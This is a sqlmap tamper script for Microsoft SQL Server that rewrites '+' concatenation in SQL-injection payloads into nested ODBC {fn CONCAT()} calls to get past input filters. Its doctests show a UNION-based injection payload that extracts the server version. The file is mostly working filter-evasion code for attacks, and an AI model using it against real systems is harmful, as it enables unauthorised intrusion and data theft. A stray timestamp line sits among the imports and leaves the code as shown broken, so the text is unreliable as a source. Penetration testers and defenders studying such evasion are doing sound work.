#!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import os
import re
from lib . core . common import singleTimeWarnMessage
from lib . core . common import zeroDepthSearch
from lib . core . compat import xrange
from lib . core . enums import DBMS
2017-02-17 12:26:25 +03:00
from lib . core . enums import PRIORITY
# Tamper-script priority (PRIORITY.HIGHEST); presumably read by the tamper loader to
# order this script relative to others — confirm against the framework
__priority__ = PRIORITY.HIGHEST
def dependencies():
    """
    Emit the one-time warning that this tamper script is meant for Microsoft SQL Server only.

    The script name shown in the warning is taken from this module's file name
    (everything before the first dot); DBMS.MSSQL names the intended backend.
    """
    script_name = os.path.basename(__file__).split(".")[0]
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (script_name, DBMS.MSSQL))
def tamper(payload, **kwargs):
    """
    Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart

    Only the first span matching "operand+...+operand" (operands being quoted
    strings or CHAR(n) calls) is rewritten; the operands are folded from left
    to right, so the first operand ends up innermost and every further operand
    adds one nesting level. A falsy payload is returned unchanged.

    Tested against:
        * Microsoft SQL Server 2008

    Requirements:
        * Microsoft SQL Server 2008+

    Notes:
        * Useful in case ('+') character is filtered
        * https://msdn.microsoft.com/en-us/library/bb630290.aspx
        * Detection side: inspection that keys on '+' alone misses this form;
          normalize ODBC {fn ...} escapes before matching

    >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
    'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'

    >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
    '1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'
    """

    result = payload

    if not payload:
        return result

    chain = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", result)
    if chain is None:
        return result

    original = chain.group(0)

    # zeroDepthSearch is expected to yield the positions of '+' that are not
    # nested inside parentheses — confirm against lib.core.common. Each slice
    # between two such positions (with its surrounding '+') is one operand.
    operands = []
    start = 0
    for position in zeroDepthSearch(original, '+'):
        operands.append(original[start:position].strip('+'))
        start = position
    operands.append(original[start:].strip('+'))

    # Fold left to right: CONCAT(CONCAT(a,b),c) ...
    folded = operands[0]
    for operand in operands[1:]:
        folded = "{fn CONCAT(%s,%s)}" % (folded, operand)

    # Every textual occurrence of the matched span is replaced.
    return result.replace(original, folded)